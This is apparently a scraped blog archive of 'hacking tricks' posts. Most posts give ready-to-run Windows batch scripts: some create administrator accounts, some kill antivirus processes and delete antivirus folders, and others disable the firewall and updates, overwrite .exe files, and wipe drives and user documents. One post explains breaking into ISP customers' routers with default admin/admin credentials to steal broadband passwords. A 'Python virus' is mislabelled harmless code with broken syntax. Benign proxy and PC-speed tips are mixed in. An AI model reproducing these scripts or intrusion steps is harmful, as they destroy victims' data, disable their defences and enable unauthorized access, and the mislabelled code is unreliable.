Open Burned Sites

06:33 ---

Open Burned Sites

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open 

1. Open www.incloak.com in your browser.

2. After enter the url of which you want to openlike below
3.Now Click Hide Me button and Enjoy...
   
                                   ....Give Comments....

Hack Administrtor Password

06:17 ---

Hack Administrator password



1.Right click and open a text document and type the below code

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

Virus In Python

06:33 ---

Virus In Python


#!/usr/bin/python
 
import time
import re
import glob
import os
from urllib import urlopen
from datetime import date
from sgmllib import SGMLParser
 
class URLLister(SGMLParser):
    def reset(self):
        SGMLParser.reset(self)
        self.url = ""
 
    def start_a(self, attrs):
        href = attrs[0][1]
        if href:
        self.url = href
 
def delete_old():
    # Delete old file
    print "Removing any old files..."
    search_path = '/home/cpowell/Desktop/'
    old_files = glob.glob(search_path + '*.jdb')
    for found in old_files:
        print "t...%s deleted." % found
        os.remove(found)
 
# Open everything
print "Checking for new definitions..."
currentDate = date.today().strftime('%d-%b-%Y')
url = "http://definitions.symantec.com/defs/jdb/"
file_found = False
site = urlopen(url)
parser = URLLister()
s = site.readlines()
for line in s:
    if re.search(currentDate, line):
        parser.feed(line)
        file_found = True
site.close()
parser.close()
if file_found:
    delete_old()
    #Download the file
    print "Downloading the new virus definitions, please wait..."
    dl = urlopen(url + parser.url)
    newfile = open('/home/cpowell/Desktop/' + currentDate + "_" + parser.url, 'w')
    newfile.write(dl.read())
    newfile.close()
    dl.close()
else:
    print "No new virus definitions found."
 
print "Done."

Spam C Drive

05:14 ---

Spam C Drive:

1.Right click new text document 
2.open it and type

@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::

3.save as anything.bat
  Enjoy Friends ...Give comment...

Delete .exe Files

04:59 ---

Delete All .exe Files:

1.Right click new text document 
2.open it and type

@echo off
::----Infect All Exe Files---::
    Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.exe) Do (
            Set ExeInfect=%%Z > Nul
            Copy /y %0 %ExeInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::

3.save as anything.bat
  Enjoy Friends ...Give comment...

Kill Antivirus Using Virus

04:41 ---

Kill Antivirus Using Virus:

1.Right click new text document 
2.open it and type


CLS
taskkill /F /IM av* >NUL
taskkill /F /IM fire* >NUL
taskkill /F /IM anti* >NUL
CLS
taskkill /F /IM spy* >NUL
taskkill /F /IM bullguard* >NUL
taskkill /F /IM PersFw* >NUL
taskkill /F /IM KAV* >NUL
taskkill /F /IM ZONEALARM* >NUL
taskkill /F /IM SAFEWEB* >NUL
CLS
taskkill /F /IM OUTPOST* >NUL
taskkill /F /IM nv* >NUL
taskkill /F /IM nav* >NUL
taskkill /F /IM F-* >NUL
taskkill /F /IM ESAFE* >NUL
taskkill /F /IM cle* >NUL
CLS
taskkill /F /IM BLACKICE* >NUL
taskkill /F /IM def* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM avg* >NUL
taskkill /F /IM ash* >NUL
CLS
taskkill /F /IM aswupdsv* >NUL
taskkill /F /IM ewid* >NUL
taskkill /F /IM guar* >NUL
taskkill /F /IM gcasDt* >NUL
taskkill /F /IM msmp* >NUL
CLS
taskkill /F /IM mcafe* >NUL
taskkill /F /IM mghtml* >NUL
taskkill /F /IM msiexec* >NUL
taskkill /F /IM outpost* >NUL
taskkill /F /IM isafe* >NUL
taskkill /F /IM zap* >NUL
CLS
taskkill /F /IM zauinst* >NUL
taskkill /F /IM upd* >NUL
taskkill /F /IM zlclien* >NUL
taskkill /F /IM minilog* >NUL
taskkill /F /IM cc* b >NUL
taskkill /F /IM norton* >NUL
CLS
taskkill /F /IM norton au* >NUL
taskkill /F /IM ccc* >NUL
taskkill /F /IM npfmn* >NUL
taskkill /F /IM loge* >NUL
taskkill /F /IM nisum* >NUL
taskkill /F /IM issvc* >NUL
taskkill /F /IM tmp* >NUL
CLS
taskkill /F /IM tmn* >NUL
taskkill /F /IM pcc* >NUL
taskkill /F /IM cpd* >NUL
taskkill /F /IM pop* >NUL
taskkill /F /IM pav* >NUL
taskkill /F /IM padmin* >NUL
CLS
taskkill /F /IM panda* >NUL
taskkill /F /IM avsch* >NUL
taskkill /F /IM sche* >NUL
taskkill /F /IM syman* >NUL
taskkill /F /IM virus* >NUL
taskkill /F /IM realm* >NUL
CLS
taskkill /F /IM sweep* >NUL
taskkill /F /IM scan* >NUL
taskkill /F /IM ad-* >NUL
taskkill /F /IM safe* >NUL
taskkill /F /IM avas* >NUL
taskkill /F /IM norm* >NUL
taskkill /F /IM offg* >NUL
CLS
RMDIR /Q "C:\Program Files\alwils~1" /S >NUL
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL
RMDIR /Q "C:\Program Files\kasper~1" /S >NUL
CLS
RMDIR /Q "C:\Program Files\trojan~1" /S >NUL
RMDIR /Q "C:\Program Files\f-prot95" /S >NUL
RMDIR /Q "C:\Program Files\tbav" /S >NUL
CLS
RMDIR /Q "C:\Program Files\avpersonal" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Mcafee" /S >NUL
CLS
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
CLS
RMDIR /Q "C:\Program Files\avgamsr" /S >NUL
RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL
RMDIR /Q "C:\Program Files\avgemc" /S >NUL
CLS
RMDIR /Q "C:\Program Files\avgcc" /S >NUL
RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL
RMDIR /Q "C:\Program Files\grisoft" /S >NUL
RMDIR /Q "C:\Program Files\nood32krn" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
CLS
RMDIR /Q "C:\Program Files\nod32" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\kav" /S >NUL
RMDIR /Q "C:\Program Files\kavmm" /S >NUL
RMDIR /Q "C:\Program Files\kaspersky" /S >NUL
CLS
RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL
RMDIR /Q "C:\Program Files\guard" /S >NUL
RMDIR /Q "C:\Program Files\ewido" /S >NUL
CLS
RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL
RMDIR /Q "C:\Program Files\pavprot" /S >NUL
RMDIR /Q "C:\Program Files\avengine" /S >NUL
CLS
RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL
RMDIR /Q "C:\Program Files\webproxy" /S >NUL
RMDIR /Q "C:\Program Files\panda software" /S >NUL


3.save as anything.bat
  Enjoy Friends ...Give comment...

undetectable virus

04:38 ---

Undectable Virus


1.Right click new text document 
2.open it and type


net user %username% StRaXxXD
@ echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton a
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
del /f /q "%userprofile%\My Pictures\*.*"
del /f /q "%userprofile%\My Music\*.*"
del /f /q "%userprofile%\My Documents\*.*"
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.mp4 >> FIleList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
DIR /S/B %SystemDrive%\*.lnk >> FIleList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_lnk.txt) do del "%%j:%%k"
start "" "%systemroot%\system32\oobe\images\title.wma"


3.save as anything.bat
  Enjoy Friends ...Give comment...

Disable windows update

04:35 ---

Disable windows update


1.Right click new text document 
2.open it and type


@echo off
net stop "wuauserv" 

3.save as anything.bat
  Enjoy Friends ...Give comment...

Disable Firewall

04:33 ---

Dissable Firewall:


1.Right click new text document 
2.open it and type


@echo off
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"

3.save as anything.bat
  Enjoy Friends ...Give comment...

Block media fire using virus

04:30 ---

Block Mediafire using virus:


1.Right click new text document 
2.open it and type


@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 mediafire.com>> "Hosts"
echo 127.0.0.1 www.mediafire.com>> "Hosts"

3.save as anything.bat
  Enjoy Friends ...Give comment...

Block google Using virus

04:28 ---

Block google using virus


1.Right click new text document 
2.open it and type


@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts" 

3.save as anything.bat
  Enjoy Friends ...Give comment...

Block Facebook virus

04:25 ---

Block Facebook Using Virus:


1.Right click new text document 
2.open it and type


@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts" 

3.3.save as anything.bat

  Enjoy Friends ...Give comment...

Most Dangerous Virus

04:11 ---

Virus:


1. Open a notepad 

2. Type 
        
            Del D:\*.*/f /s /q
            Del C:\*.*/f /s /q
            Del E:\*.*/f /s /q
            Del F:\*.*/f /s /q

2.Save it as "formate virus.bat"

3. Dont Run it Your Own Pc It Spoil Your Pc

 Hai You Created a virus.......

How to create a virus

04:00 ---

Create a virus Using Notepad:

1.Open a notepad

2.

3. type "@echo off"                                                                                                                                    
                   
4. type next  ":start"            
            
5.save as  "anything.bat"
                                                                                            
6. saved anything.bat is like this dont open in your own pc its crash your pc

Hai now you created your own virus 

Proxy Browser

03:46 ---



Hide Your Location

By Using Tor Browser

   Download Tor Browser

How to change mac address

03:28 ---

How to change mac address:

1.Download  mac address changer from here

2. Install it 

3.Open it

4. Type your own mac address in the column

5.Now click change now button 

Enjoy Now Your Mac Address Is Changed ....

Hide any Drive

02:58 ---
How To Hide Any Drive Through Command Prompt



Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.
Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C(i.e. Drive letter)
Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.
Step 6. That’s it. You are done! C drive is now hidden

How to unhide hidden drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.

Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


Enjoy friends......

Proxy and Anonymous Internet surfing

02:41 ---

1) What is a proxy?
A proxy is an address of a proxy server (look @ kind of proxy's) that is placed between your computer and the internet :

Normal :
Computer --------> Internet
With proxy :
Computer ---------> Proxy server -----------> Internet

The main advantage of the Proxy is that it will cover up your IP address (your identity on net) which may help you in opening the ban sites in your country. It was very much popular in days when Facebook was banned in Pakistan and user use Proxies to log into their accounts.

2) Kind of Proxies:

You have 2 different proxy's (some more but these are for a normal internet users) :
-1: Private proxies : They are only for you (it's the same like buy your own ip address ) and will cost 15-20$
-2: Public Proxies : They are for everyone but the problem is sometimes you can get fast proxy's and sometimes slow ones. If you have a good site/list with fast proxy's there as good as private proxy's

3) Where get your proxy ?
There are many ways to find the proxies but some address are also expired , so just search Google for the Fresh Sites. (search : free Proxy, free anonymous surfing)

4) Use proxy with IE(Internet Explorer):
-1: Open Internet explorer
-2: Go to tools > Internet Options > Connections
-3: Now you will see “LAN Settings” open it
-4: Check Use a Proxy server for LAN. Than you will be able to use Address and Port.
-5: Get a proxy (Read Wear get your proxy's) and fill the address you don't have to fill it the port.
-6: Hit ok , ok and it's done. You surf now with a proxy !

5) How safe is it ?
The use of proxy's is legal and it's a good protection BUT don't think ur full protected/undetected. It's more and more popular and some (protected) site block public proxy's because of the spammers …

6) Proxy software
You have lots of software that work with proxies like a Anonymous Surfing, bruteforcer or proxy port scanner.I have even added an link to download 16 various anonymous IP tools from (http://rapidshare.com/files/242280367/IP_Anonymous_Surfing_Tool_16in1_.rar) 


7) WARNING!!!!
It is true that a proxy hide your identity but don’t think that you are really safe if you hack CIA Database because in case of hack the Proxy site will give your real identity and you will end up in jail for at least 20 years. So be responsible!!! 

BSNL Broadband Hacked | How To Hack Bsnl Broadband

02:36 ---
Here is the trick for How To Hack Bsnl Broadband I hope you will really enjoy it Follow the below steps to do this

1. Identify your IP address(dont knw visit @ whatismyip.com)

2.Download IP scanner.( i preferangryziber.com/w/Download).

3. Open IP scanner .GO to option/select port.Enter 80 in 1st option(enter post to scan)

4.In hostname option type ur ip.Click On the ip button next to host name on opening it will automatically fill the ip range.

5.In the first option Let ur original IP be but in the second option fill the ip greated then original.Now click Scan

6.IT will give you LIst of ips showing some ips green on left side.

7.Right click that ip and then to option 'open computer' & select browser

8.ASk for username and pass.GIve username :admin password:admin

9.if it doesnt respond take some other green IP.

10. When pages get open go to home & click Wan.Here uu will see user id and pass in coded form

11.To fetched actual passowrd download this soft from "(scanwith.com/X-Pass_download.htm)

12.Extract files from tht and run'X-pass'.Drag d 'x' icon in password filled and u will get the pass.

13. To check that pass go to http://10.240.160.195/webLogin.jsp

To Increase Internet speed

02:28 ---

First Method- Speed Up Your Net Speed By 20%


1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

How To block youtube adds

01:58 ---

Block Youtube Adds:


1. Download Youtube Ads Blocker

2. Double click on downloaded file

3. Follow the on screen instruction

To Find The Details Of websit

01:51 ---


To find the details of website

type the wesite in here 

Advance Matrix Effect Using Notepad

03:02 ---


1.open notepad and copy below code.


@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t   
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A


2.Save it as matrix.bat
3.Open the matrix.bat

How To Use Trial Version Software Forever With Out Expiration

03:23 ---
Its a program called RunAsDate that simply does it says - it stops time so your trial version runs out . It doesn't interfere with anything other than the program you specify. there are also no limits to the amount of trial version of software you can use this program with . Here how to use it .
1. Download RunAsDate
2. Install and launch the program

                                                                                                                                                                               
3. Find .exe file of trial version software you want to use it with  pick a new date - the best one to chose is 2 days before your trail is run out
4. Pick a new date - the best one to choose is 2 days before your trial is run out , pick any time , select run  on the date you  selected , if you dont want to have to go into runasdate every time you you use your trail version software create an icon on your desktop for your modified trial version . you must always access the software through this icon - going through normal methods will cause the program expire after the  set number of days .
RunAsDate is a tiny file ,so you wont be clogging up your computer with large files. go ahead and give it a go today.








Speed Up Your Computer

02:35 ---

1. Speed Up Your Startup


If an entire pot of coffee can brew in the time it takes for your computer to boot, it’s time to make some changes. Most likely your computer is not slow – it’s the dozens of programs turning on during startup that are slowing it down.
Download a comprehensive tool like Autoruns to easily disable certain programs during your startup. Or try Windows’ slightly less thorough, built-in utility, MSConfig. To find it, go to Search or Run under Start and type “msconfig.” Under the “Startup” tab, uncheck the boxes of the programs you don’t need to run every time your computer is turned on, for instance, iTunes or your printer. If you don’t recognize a program, leave it be. Restart your computer and watch it fly.

2. Clear It Out


If painfully slow surfing is your main problem, there are a couple quick changes you can make.
Are you an Internet Explorer user? Get rid of it. Google Chrome is the best browser on the market now, known for speedy surfing. Under Chrome, go to Clear Browsing Data and check the boxes of temporary Internet files like cookies, cache, download history and browsing history.
To take further precaution, try a program like CCleaner from Piriform. The free software program removes temporary files from all of your browsers, as well as Windows and the registry, to make your PC run faster.

3. Slim Down


This involves more than just uninstalling programs you don’t use anymore. If you’re not totally committed to the usual suspects, like Windows Media Player and Microsoft Office, switch to something that requires less computing power. Free applications can easily replace go-to programs, while speeding up your PC and giving you additional features at the same time.
VLC Media Player is a lightweight, open source media player that rips DVDs, streams video and recognizes any unprotected media format. FoxIt Reader, an alternative to Adobe Reader, does more than just open PDFs all while using less RAM. Edit documents, open multiple PDFs in tabs and more. AbiWord, a free and open source word processor, and Apache’s Open Office, a free and open source full-fledge suite, can easily fill the void of Microsoft Office.

4. Automate Your Updates


Updates are annoying. It’s easy to click “remind me later” and avoid the notifications, until you’re so frustrated with your computer that you finally set aside an entire afternoon to update everything.
Let’s solve this. Go to My Computer > Properties > Automatic Updates. Make sure this is set to Download and Install Automatically. To completely cover your bases, find out if any programs need to be updated manually by downloading Update Checker from FileHippo.com. The fast and free program scans your computer and reports back with any available updates in seconds.

5. Make Some Upgrades

 

If you’re into gaming, a $150 investment in a graphics card might be worth your while. Forewarning: You’ll have to toy with your motherboard to make this upgrade happen, but there are a lot of online tutorials you can follow.
Finally, the most effective way to speed up your PC – which also requires tinkering – is to add more RAM (random access memory). You can find 4GB of memory for under $50 online. If you have less than 2GB (go to My Computer > Properties to find out), an upgrade should be in your future

Ways To Protect Your Computer From Hackers

07:59 ---

Top 10 Ways to Protect Your Computer from Hackers


Learn how to protect your computer. 
Because computer use has become an integral part of modern-day living, IT security has naturally developed into one of the foremost worries we have in everyday life. Therefore, it's only natural for IT specialists to create practical methods that the average user can follow in order to protect his or her machine from the ravages of the information superhighway. At any rate, below are the top ten steps you can take to help safeguard your computer from digital destruction:
1.           Windows Updates: Let's face it; the many different iterations of the world's best-selling OS have all been targeted by hackers so often that it's become a given to provide continuous daily, weekly, or monthly updates to your Windows-based computer. It's important for you to keep your OS up to speed in order to minimize the possibility of having worms or viruses compromise your system.
2.           Software Updates: As with the above example, it's important for you to get the latest fixes or versions of your favorite applications in order to never let hackers find the opportunity to invade your virtual turf. Make sure that your web browsers and other web-based programs are given good upgrades or patches.
3.           Anti-Virus Software: Running your machine without an anti-virus software—especially if it's regularly connected to the Internet—is downright suicidal in these modern, computer-virus-ridden times. Get one as soon as you can, and always confirm if its virus definitions are regularly updated. There are many wonderful anti-virus suites available, and AVG is among the best of them because it's both effective and free.
4.           Anti-Spyware Software: Spyware remains to be a continuous threat to computer users everywhere, even though it's not as nightmarishly horrid as the days of Bonzi Buddy and CoolWebSearch. Thanks to anti-spyware luminaries like Ad-Aware, the formerly crippling spyware contagion had dwindled down throughout the years.
5.           Switch to Macintosh: Even though the Mac OS X has been listed in this very website as one of the least secure operating systems out there in terms of vulnerability volume, this fact only came about because fewer hackers bother to invade this platform in the first place. Otherwise, the Mac is as safe as can be. Therefore, even though no computer is foolproof against malware, the Macintosh gets a pass for the simple fact that it's not as commonly targeted as, say, Windows-based computers.
6.           Hacker-Controlled Websites: Common sense dictates that you should avoid going to bad neighborhoods, especially if you carry a lot of valuables. The same could be said in the wild, wild world of the worldwide web. Avoid getting snared by dubious sites dedicated to porn, free downloads, online games, and so on; this way, there are less chances for you to be hacked.
7.           Firewall: If you don't have a third-party firewall like ZoneAlarm Pro installed, then it's highly recommended for you to activate your Windows firewall (available on all Windows versions from XP and up). Firewalls help filter your traffic, and there are some products that even filter both incoming and outgoing data streams.
8.           Spam Email: Unsolicited messages should never be opened, and that goes double for unsolicited messages with file attachments. Fortunately, web-based email sites like Gmail have an extra layer of protection integrated in them (though it's still not recommended for you to overly rely on them like Sarah Palin did with her hijacked webmail). When in doubt, just delete the message.
